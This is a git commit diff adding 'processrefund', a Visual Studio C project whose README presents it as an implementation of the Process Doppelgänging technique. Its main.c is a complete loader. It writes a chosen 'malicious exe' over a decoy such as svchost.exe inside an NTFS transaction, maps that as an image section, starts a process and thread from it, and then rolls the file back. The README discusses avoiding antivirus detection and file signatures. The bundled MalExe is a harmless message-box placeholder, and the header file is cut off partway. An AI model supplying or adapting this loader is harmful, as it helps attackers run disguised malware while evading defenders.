updates and moves

n/a
2026-06-17 00:09:23 +00:00 · 2022-04-11 20:00:13 -05:00
parent 1275ea2e03
commit 900263ea6f
809 changed files with 149115 additions and 1594 deletions
@@ -0,0 +1,219 @@
+## Ignore Visual Studio temporary files, build results, and
+## files generated by popular Visual Studio add-ons.
+
+# User-specific files
+*.suo
+*.user
+*.userosscache
+*.sln.docstates
+
+# User-specific files (MonoDevelop/Xamarin Studio)
+*.userprefs
+
+# Build results
+[Dd]ebug/
+[Dd]ebugPublic/
+[Rr]elease/
+[Rr]eleases/
+x64/
+x86/
+build/
+bld/
+[Bb]in/
+[Oo]bj/
+
+# Visual Studio 2015 cache/options directory
+.vs/
+# Uncomment if you have tasks that create the project's static files in wwwroot
+#wwwroot/
+
+# MSTest test Results
+[Tt]est[Rr]esult*/
+[Bb]uild[Ll]og.*
+
+# NUNIT
+*.VisualState.xml
+TestResult.xml
+
+# Build Results of an ATL Project
+[Dd]ebugPS/
+[Rr]eleasePS/
+dlldata.c
+
+# DNX
+project.lock.json
+artifacts/
+
+*_i.c
+*_p.c
+*_i.h
+*.ilk
+*.meta
+*.obj
+*.pch
+*.pdb
+*.pgc
+*.pgd
+*.rsp
+*.sbr
+*.tlb
+*.tli
+*.tlh
+*.tmp
+*.tmp_proj
+*.log
+*.vspscc
+*.vssscc
+.builds
+*.pidb
+*.svclog
+*.scc
+
+# Chutzpah Test files
+_Chutzpah*
+
+# Visual C++ cache files
+ipch/
+*.aps
+*.ncb
+*.opensdf
+*.sdf
+*.cachefile
+
+# Visual Studio profiler
+*.psess
+*.vsp
+*.vspx
+*.sap
+
+# TFS 2012 Local Workspace
+$tf/
+
+# Guidance Automation Toolkit
+*.gpState
+
+# ReSharper is a .NET coding add-in
+_ReSharper*/
+*.[Rr]e[Ss]harper
+*.DotSettings.user
+
+# JustCode is a .NET coding add-in
+.JustCode
+
+# TeamCity is a build add-in
+_TeamCity*
+
+# DotCover is a Code Coverage Tool
+*.dotCover
+
+# NCrunch
+_NCrunch_*
+.*crunch*.local.xml
+nCrunchTemp_*
+
+# MightyMoose
+*.mm.*
+AutoTest.Net/
+
+# Web workbench (sass)
+.sass-cache/
+
+# Installshield output folder
+[Ee]xpress/
+
+# DocProject is a documentation generator add-in
+DocProject/buildhelp/
+DocProject/Help/*.HxT
+DocProject/Help/*.HxC
+DocProject/Help/*.hhc
+DocProject/Help/*.hhk
+DocProject/Help/*.hhp
+DocProject/Help/Html2
+DocProject/Help/html
+
+# Click-Once directory
+publish/
+
+# Publish Web Output
+*.[Pp]ublish.xml
+*.azurePubxml
+# TODO: Comment the next line if you want to checkin your web deploy settings 
+# but database connection strings (with potential passwords) will be unencrypted
+*.pubxml
+*.publishproj
+
+# NuGet Packages
+*.nupkg
+# The packages folder can be ignored because of Package Restore
+**/packages/*
+# except build/, which is used as an MSBuild target.
+!**/packages/build/
+# Uncomment if necessary however generally it will be regenerated when needed
+#!**/packages/repositories.config
+
+# Windows Azure Build Output
+csx/
+*.build.csdef
+
+# Windows Store app package directory
+AppPackages/
+
+# Visual Studio cache files
+# files ending in .cache can be ignored
+*.[Cc]ache
+# but keep track of directories ending in .cache
+!*.[Cc]ache/
+
+# Others
+ClientBin/
+[Ss]tyle[Cc]op.*
+~$*
+*~
+*.dbmdl
+*.dbproj.schemaview
+*.pfx
+*.publishsettings
+node_modules/
+orleans.codegen.cs
+
+# RIA/Silverlight projects
+Generated_Code/
+
+# Backup & report files from converting an old project file
+# to a newer Visual Studio version. Backup files are not needed,
+# because we have git ;-)
+_UpgradeReport_Files/
+Backup*/
+UpgradeLog*.XML
+UpgradeLog*.htm
+
+# SQL Server files
+*.mdf
+*.ldf
+
+# Business Intelligence projects
+*.rdl.data
+*.bim.layout
+*.bim_*.settings
+
+# Microsoft Fakes
+FakesAssemblies/
+
+# Node.js Tools for Visual Studio
+.ntvs_analysis.dat
+
+# Visual Studio 6 build log
+*.plg
+
+# Visual Studio 6 workspace options file
+*.opt
+
+# Visual Studio LightSwitch build output
+**/*.HTMLClient/GeneratedArtifacts
+**/*.DesktopClient/GeneratedArtifacts
+**/*.DesktopClient/ModelManifest.xml
+**/*.Server/GeneratedArtifacts
+**/*.Server/ModelManifest.xml
+_Pvt_Extensions
+
+processrefund\.VC\.VC\.opendb
@@ -0,0 +1,28 @@
+
+Copyright (c) 2017, 
+All rights reserved.
+
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions are met:
+
+* Redistributions of source code must retain the above copyright notice, this
+  list of conditions and the following disclaimer.
+
+* Redistributions in binary form must reproduce the above copyright notice,
+  this list of conditions and the following disclaimer in the documentation
+  and/or other materials provided with the distribution.
+
+* Neither the name of [project] nor the names of its
+  contributors may be used to endorse or promote products derived from
+  this software without specific prior written permission.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
+FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
+CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
+OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@@ -0,0 +1,121 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <ProjectGuid>{81FCF866-89C7-466B-A52B-3A41A45BC9E0}</ProjectGuid>
+    <RootNamespace>MalExe</RootNamespace>
+    <WindowsTargetPlatformVersion>8.1</WindowsTargetPlatformVersion>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v140</PlatformToolset>
+    <CharacterSet>MultiByte</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v140</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>MultiByte</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v140</PlatformToolset>
+    <CharacterSet>MultiByte</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>Application</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v140</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>MultiByte</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Label="Shared">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup />
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <SDLCheck>true</SDLCheck>
+      <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
+      <ControlFlowGuard>false</ControlFlowGuard>
+    </ClCompile>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <SDLCheck>true</SDLCheck>
+      <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
+    </ClCompile>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <SDLCheck>true</SDLCheck>
+    </ClCompile>
+    <Link>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <SDLCheck>true</SDLCheck>
+    </ClCompile>
+    <Link>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClCompile Include="main.c" />
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>
@@ -0,0 +1,22 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup>
+    <Filter Include="Source Files">
+      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
+      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
+    </Filter>
+    <Filter Include="Header Files">
+      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
+      <Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
+    </Filter>
+    <Filter Include="Resource Files">
+      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
+      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
+    </Filter>
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="main.c">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+  </ItemGroup>
+</Project>
@@ -0,0 +1,8 @@
+#include <stdio.h>
+#include <Windows.h>
+
+int main(void)
+{
+	//__asm int 3;
+	MessageBox(0, "Message body", "Message title", MB_OK);
+}
@@ -0,0 +1,28 @@
+# Process Refund
+
+An attempt to implement Process Doppelgänging
+## Getting Started
+
+Just clone the repo and open the .sln with Visual Studio 2015.
+
+### Prerequisites
+
+Currently this works only in x64.
+To use you need a dummy exe like svchost.exe and your malicous exe.
+read below - you need to be able to write over the file.
+
+WARNING DONT USE ON WIN10 YOU WILL GET A BSOD.
+
+exmaple:
+
+	processrefund.exe svchost.exe MalExe.exe
+ ![alt text](https://raw.githubusercontent.com/spajed/processrefund/master/example.png)
+ ![alt text](https://raw.githubusercontent.com/spajed/processrefund/master/modules.png)
+ ![alt text](https://raw.githubusercontent.com/spajed/processrefund/master/memory.png)
+
+### Problems with Process Doppelgänging
+* You can not replace any file. If you try to replace  C:\windows\system32\svchost.exe you will get "Access Denied".
+* This techinque will not bypass all AntiViruses because of the use of NtCreateThreadEx, which is equal to CreateRemoteThread.
+   An AntiVirus may monitor the creation of remote thread (via PsSetCreateThreadNotifyRoutine) thus detecting our Doppelgänging. Also an AntiVirus may compare the memory with the image of the created process and will be aware of our malicous process. This techinque may be good to avoid file signatures and loading executables without wiritng them to disk("filesless") but it will not avoid everything.
+## Acknowledgments
+* https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf
@@ -0,0 +1,38 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 14
+VisualStudioVersion = 14.0.25420.1
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "processrefund", "processrefund\processrefund.vcxproj", "{DA9D5E53-6160-4B44-A770-903C8C4C621D}"
+EndProject
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "MalExe", "MalExe\MalExe.vcxproj", "{81FCF866-89C7-466B-A52B-3A41A45BC9E0}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|x64 = Debug|x64
+		Debug|x86 = Debug|x86
+		Release|x64 = Release|x64
+		Release|x86 = Release|x86
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{DA9D5E53-6160-4B44-A770-903C8C4C621D}.Debug|x64.ActiveCfg = Debug|x64
+		{DA9D5E53-6160-4B44-A770-903C8C4C621D}.Debug|x64.Build.0 = Debug|x64
+		{DA9D5E53-6160-4B44-A770-903C8C4C621D}.Debug|x86.ActiveCfg = Debug|Win32
+		{DA9D5E53-6160-4B44-A770-903C8C4C621D}.Debug|x86.Build.0 = Debug|Win32
+		{DA9D5E53-6160-4B44-A770-903C8C4C621D}.Release|x64.ActiveCfg = Release|x64
+		{DA9D5E53-6160-4B44-A770-903C8C4C621D}.Release|x64.Build.0 = Release|x64
+		{DA9D5E53-6160-4B44-A770-903C8C4C621D}.Release|x86.ActiveCfg = Release|Win32
+		{DA9D5E53-6160-4B44-A770-903C8C4C621D}.Release|x86.Build.0 = Release|Win32
+		{81FCF866-89C7-466B-A52B-3A41A45BC9E0}.Debug|x64.ActiveCfg = Debug|x64
+		{81FCF866-89C7-466B-A52B-3A41A45BC9E0}.Debug|x64.Build.0 = Debug|x64
+		{81FCF866-89C7-466B-A52B-3A41A45BC9E0}.Debug|x86.ActiveCfg = Debug|Win32
+		{81FCF866-89C7-466B-A52B-3A41A45BC9E0}.Debug|x86.Build.0 = Debug|Win32
+		{81FCF866-89C7-466B-A52B-3A41A45BC9E0}.Release|x64.ActiveCfg = Release|x64
+		{81FCF866-89C7-466B-A52B-3A41A45BC9E0}.Release|x64.Build.0 = Release|x64
+		{81FCF866-89C7-466B-A52B-3A41A45BC9E0}.Release|x86.ActiveCfg = Release|Win32
+		{81FCF866-89C7-466B-A52B-3A41A45BC9E0}.Release|x86.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal
@@ -0,0 +1,344 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <Windows.h>
+#include <KtmW32.h>
+#include <lmerr.h>
+#include <winternl.h>
+#include <psapi.h>
+#include <Processthreadsapi.h>
+#include "ntdefs.h"
+
+// To ensure correct resolution of symbols, add Psapi.lib to TARGETLIBS
+#pragma comment(lib, "psapi.lib")
+
+
+void
+DisplayErrorText(
+	DWORD dwLastError
+)
+{
+	HMODULE hModule = NULL; // default to system source
+	LPSTR MessageBuffer;
+	DWORD dwBufferLength;
+
+	DWORD dwFormatFlags = FORMAT_MESSAGE_ALLOCATE_BUFFER |
+		FORMAT_MESSAGE_IGNORE_INSERTS |
+		FORMAT_MESSAGE_FROM_SYSTEM;
+
+	//
+	// If dwLastError is in the network range, 
+	//  load the message source.
+	//
+
+	if (dwLastError >= NERR_BASE && dwLastError <= MAX_NERR) {
+		hModule = LoadLibraryEx(
+			TEXT("netmsg.dll"),
+			NULL,
+			LOAD_LIBRARY_AS_DATAFILE
+		);
+
+		if (hModule != NULL)
+			dwFormatFlags |= FORMAT_MESSAGE_FROM_HMODULE;
+	}
+
+	//
+	// Call FormatMessage() to allow for message 
+	//  text to be acquired from the system 
+	//  or from the supplied module handle.
+	//
+
+	if (dwBufferLength = FormatMessageA(
+		dwFormatFlags,
+		hModule, // module to get message from (NULL == system)
+		dwLastError,
+		MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), // default language
+		(LPSTR)&MessageBuffer,
+		0,
+		NULL
+	))
+	{
+		DWORD dwBytesWritten;
+
+		//
+		// Output message string on stderr.
+		//
+		WriteFile(
+			GetStdHandle(STD_ERROR_HANDLE),
+			MessageBuffer,
+			dwBufferLength,
+			&dwBytesWritten,
+			NULL
+		);
+
+		//
+		// Free the buffer allocated by the system.
+		//
+		LocalFree(MessageBuffer);
+	}
+
+	//
+	// If we loaded a message source, unload it.
+	//
+	if (hModule != NULL)
+		FreeLibrary(hModule);
+}
+
+LPVOID GetBaseAddressByName(HANDLE hProcess, char *module)
+{
+	MEMORY_BASIC_INFORMATION    mbi;
+	SYSTEM_INFO si;
+	LPVOID lpMem;
+	char moduleName[MAX_PATH] = { 0 };
+	/* Get maximum address range from system info */
+	GetSystemInfo(&si);
+	/* walk process addresses */
+	lpMem = 0;
+	while (lpMem < si.lpMaximumApplicationAddress) {
+		VirtualQueryEx(hProcess, lpMem, &mbi, sizeof(MEMORY_BASIC_INFORMATION));
+		GetMappedFileName(hProcess, mbi.BaseAddress, moduleName, MAX_PATH);
+
+		if (strstr(moduleName,module))//mbi.Type & MEM_IMAGE)
+			return mbi.BaseAddress;
+		/* increment lpMem to next region of memory */
+		lpMem = (LPVOID)((ULONGLONG)mbi.BaseAddress +(ULONGLONG)mbi.RegionSize);
+			
+	}
+	return NULL;
+}
+
+int main(int argc,char *argv[] )
+{
+
+	LARGE_INTEGER liFileSize;
+	DWORD dwFileSize;
+	HANDLE hSection;
+	NTSTATUS ret;
+	
+	UNICODE_STRING  string;
+	if (argc < 3) {
+		printf("%s <exe to Doppelgang> <your exe>",argv[0]);
+		return 0;
+	}
+	HMODULE hNtdll = GetModuleHandle("ntdll.dll");
+	if (NULL==hNtdll)
+	{
+		DisplayErrorText(GetLastError());
+		return -1;
+	}
+	printf("[+] Got ntdll.dll at 0x%llx\n", hNtdll);
+	NtCreateSection createSection = (NtCreateSection)GetProcAddress(hNtdll, "NtCreateSection");
+	
+	if (NULL == createSection)
+	{
+		DisplayErrorText(GetLastError());
+		return -1;
+	}
+	printf("[+] Got NtCreateSection at 0x%08p\n", createSection);
+	WCHAR temp[MAX_PATH] = { 0 };
+	char fileFullPath[MAX_PATH] = { 0 };
+
+	GetFullPathName(argv[1], MAX_PATH, fileFullPath, NULL);
+	MultiByteToWideChar(CP_UTF8, 0, fileFullPath, strlen(fileFullPath), temp, MAX_PATH);
+	HANDLE hTransaction = CreateTransaction(NULL,0,0,0,0,0, temp);
+	if (INVALID_HANDLE_VALUE == hTransaction)
+	{
+		DisplayErrorText(GetLastError());
+		return -1;
+	}
+	printf("[+] Created a transaction, handle 0x%x\n", hTransaction);
+
+	HANDLE hTransactedFile = CreateFileTransacted(fileFullPath,
+		GENERIC_WRITE | GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL, hTransaction, NULL, NULL);
+	if (INVALID_HANDLE_VALUE == hTransactedFile)
+	{
+		DisplayErrorText(GetLastError());
+		return -1;
+	}
+	printf("[+] CreateFileTransacted on %s, handle 0x%x\n", fileFullPath, hTransactedFile);
+
+	HANDLE hExe = CreateFile(argv[2],
+		 GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
+	if (INVALID_HANDLE_VALUE == hExe)
+	{
+		DisplayErrorText(GetLastError());
+		return -1;
+	}
+	printf("[+] opened malexe.exe, handle 0x%x\n", hExe);
+
+	BOOL err = GetFileSizeEx(hExe, &liFileSize);
+	if (FALSE == err)
+	{
+		DisplayErrorText(GetLastError());
+		return -1;
+	}
+	dwFileSize = liFileSize.LowPart;
+	printf("[+] malexe size is 0x%x\n", dwFileSize);
+
+	BYTE *buffer = malloc(dwFileSize);
+	if (NULL == buffer)
+	{
+		printf("Malloc failed\n");
+		return -1;
+	}
+	printf("[+] allocated 0x%x bytes\n", dwFileSize);
+	DWORD read = 0;
+	if (FALSE == ReadFile(hExe, buffer, dwFileSize, &read, NULL))
+	{
+		DisplayErrorText(GetLastError());
+		return -1;
+	}
+	printf("[+] read malexe.exe to buffer\n");
+
+	DWORD wrote = 0;
+	if (FALSE == WriteFile(hTransactedFile, buffer, dwFileSize, &wrote, NULL))
+
+	{
+		DisplayErrorText(GetLastError());
+		return -1;
+	}
+	printf("[+] over wrote %s in transcation\n", fileFullPath);
+
+	ret = createSection(&hSection, SECTION_ALL_ACCESS, NULL, 0, PAGE_READONLY, SEC_IMAGE, hTransactedFile);
+	if(FALSE == NT_SUCCESS(ret))
+	{
+		DisplayErrorText(GetLastError());
+		return -1;
+	}
+	printf("[+] created a section with our new malicious %s\n", fileFullPath);
+
+
+
+	NtCreateProcessEx createProcessEx = (NtCreateProcessEx)GetProcAddress(hNtdll, "NtCreateProcessEx");
+	if (NULL == createProcessEx)
+	{
+		DisplayErrorText(GetLastError());
+		return -1;
+	}
+	printf("[+] Got NtCreateProcessEx 0x%08p\n", createProcessEx);
+
+	HANDLE hProcess=0;
+	my_RtlInitUnicodeString initUnicodeString = (my_RtlInitUnicodeString)GetProcAddress(hNtdll, "RtlInitUnicodeString");
+
+	initUnicodeString(&string, temp);
+
+	ret = createProcessEx(&hProcess, GENERIC_ALL,NULL, GetCurrentProcess(), PS_INHERIT_HANDLES, hSection, NULL, NULL, FALSE);
+	
+	printf("[+] Created our process, handle 0x%x\n", hProcess);
+	if (FALSE == NT_SUCCESS(ret))
+	{
+		DisplayErrorText(GetLastError());
+		return -1;
+	}
+
+	PIMAGE_DOS_HEADER dos_header = (PIMAGE_DOS_HEADER)buffer;
+
+	PIMAGE_NT_HEADERS32 ntHeader = (PIMAGE_NT_HEADERS32)(buffer + dos_header->e_lfanew);
+
+	ULONGLONG oep = ntHeader->OptionalHeader.AddressOfEntryPoint;
+
+	oep+=(ULONGLONG)GetBaseAddressByName(hProcess,argv[1]);
+
+
+	printf("[+] our new process oep is 0x%llx\n", oep);
+	NtCreateThreadEx createThreadEx = (NtCreateThreadEx)GetProcAddress(hNtdll, "NtCreateThreadEx");
+	if (NULL == createThreadEx)
+	{
+		DisplayErrorText(GetLastError());
+		return -1;
+	}
+	printf("[+] Got NtCreateThreadEx 0x%08p\n", createThreadEx);
+
+
+	my_PRTL_USER_PROCESS_PARAMETERS ProcessParams = 0;
+	RtlCreateProcessParametersEx createProcessParametersEx = (RtlCreateProcessParametersEx)GetProcAddress(hNtdll, "RtlCreateProcessParametersEx");
+	if (NULL == createProcessParametersEx)
+	{
+		DisplayErrorText(GetLastError());
+		return -1;
+	}
+	printf("[+] Got RtlCreateProcessParametersEx 0x%08p\n", createProcessParametersEx);
+
+
+
+	
+	ret = createProcessParametersEx(&ProcessParams, &string,NULL,NULL,&string,NULL,NULL,NULL,NULL,NULL, RTL_USER_PROC_PARAMS_NORMALIZED);
+	if (FALSE == NT_SUCCESS(ret))
+	{
+		DisplayErrorText(GetLastError());
+		return -1;
+	}
+	printf("[+] creating Process Parameters at 0x%p\n", ProcessParams);
+
+	LPVOID RemoteProcessParams;
+	RemoteProcessParams = VirtualAllocEx(hProcess, ProcessParams, (ULONGLONG)ProcessParams&0xffff + ProcessParams->EnvironmentSize + ProcessParams->MaximumLength, MEM_COMMIT | MEM_RESERVE,PAGE_READWRITE);
+	if(NULL == RemoteProcessParams)
+	{
+		DisplayErrorText(GetLastError());
+		return -1;
+	}
+	printf("[+] creating memory at process for our paramters 0x%08x\n", RemoteProcessParams);
+
+	ret=WriteProcessMemory(hProcess, ProcessParams, ProcessParams, ProcessParams->EnvironmentSize + ProcessParams->MaximumLength,NULL);
+	if (FALSE == NT_SUCCESS(ret))
+	{
+		DisplayErrorText(GetLastError());
+		return -1;
+	}
+	printf("[+] writing our paramters to the process\n");
+
+	my_NtQueryInformationProcess queryInformationProcess = (my_NtQueryInformationProcess)GetProcAddress(hNtdll, "NtQueryInformationProcess");
+	if (NULL == queryInformationProcess)
+	{
+		DisplayErrorText(GetLastError());
+		return -1;
+	}
+	printf("[+] Got NtQueryInformationProcess 0x%08p\n", queryInformationProcess);
+
+	PROCESS_BASIC_INFORMATION info;
+
+	ret = queryInformationProcess(
+		hProcess,
+		ProcessBasicInformation,
+		&info,
+		sizeof(info),
+		0);
+
+	if (FALSE == NT_SUCCESS(ret))
+	{
+		DisplayErrorText(GetLastError());
+		return -1;
+	}
+
+	PEB *peb = info.PebBaseAddress;
+
+	ret=WriteProcessMemory(hProcess, &peb->ProcessParameters, &ProcessParams, sizeof(LPVOID), NULL);
+	if (FALSE == NT_SUCCESS(ret))
+	{
+		DisplayErrorText(GetLastError());
+		return -1;
+	}
+	printf("[+] writing our paramters to the process peb 0x%08p\n", peb);
+
+	HANDLE hThread;
+	ret = createThreadEx(&hThread, GENERIC_ALL, NULL, hProcess, (LPTHREAD_START_ROUTINE)oep, NULL, FALSE, 0, 0, 0, NULL);
+	printf("[+] Thread created with handle %x\n", hThread);
+	if (FALSE == NT_SUCCESS(ret))
+	{
+		DisplayErrorText(GetLastError());
+		return -1;
+	}
+	if (FALSE == RollbackTransaction(hTransaction))
+	{
+		DisplayErrorText(GetLastError());
+		return -1;
+	}
+	printf("[+] rolling back the original %s\n", fileFullPath);
+
+	CloseHandle(hProcess);
+	CloseHandle(hExe);
+	CloseHandle(hTransactedFile);
+	CloseHandle(hTransaction);
+
+    getchar();
+	return 0;
+}
@@ -0,0 +1,339 @@
+#pragma once
+#include <Windows.h>
+#include <KtmW32.h>
+#include <lmerr.h>
+#include <winternl.h>
+
+#define RTL_MAX_DRIVE_LETTERS   32
+#define RTL_USER_PROC_PARAMS_NORMALIZED 0x00000001
+
+typedef struct _UNICODE_STRING_DWORD64
+{
+	WORD Length;
+	WORD MaximumLength;
+	DWORD64 Buffer;
+} UNICODE_STRING64, STRING64, *PSTRING64;
+
+struct _LIST_ENTRY_DWORD64
+{
+	DWORD64 Flink;
+	DWORD64 Blink;
+};
+
+typedef struct _CURDIR_64
+{
+	UNICODE_STRING64 DosPath;
+	UINT64 Handle;
+} CURDIR64, *PCURDIR64;
+typedef struct _RTL_DRIVE_LETTER_CURDIR_64
+{
+	WORD Flags;
+	WORD Length;
+	ULONG TimeStamp;
+	STRING64 DosPath;
+} RTL_DRIVE_LETTER_CURDIR64, *PRTL_DRIVE_LETTER_CURDIR64;
+typedef struct _RTL_USER_PROCESS_PARAMETERS_64
+{
+	ULONG MaximumLength;
+	ULONG Length;
+	ULONG Flags;
+	ULONG DebugFlags;
+	UINT64 ConsoleHandle;
+	ULONG ConsoleFlags;
+	UINT64 StandardInput;
+	UINT64 StandardOutput;
+	UINT64 StandardError;
+	CURDIR64 CurrentDirectory;
+	UNICODE_STRING64 DllPath;
+	UNICODE_STRING64 ImagePathName;
+	UNICODE_STRING64 CommandLine;
+	UINT64 Environment;
+	ULONG StartingX;
+	ULONG StartingY;
+	ULONG CountX;
+	ULONG CountY;
+	ULONG CountCharsX;
+	ULONG CountCharsY;
+	ULONG FillAttribute;
+	ULONG WindowFlags;
+	ULONG ShowWindowFlags;
+	UNICODE_STRING64 WindowTitle;
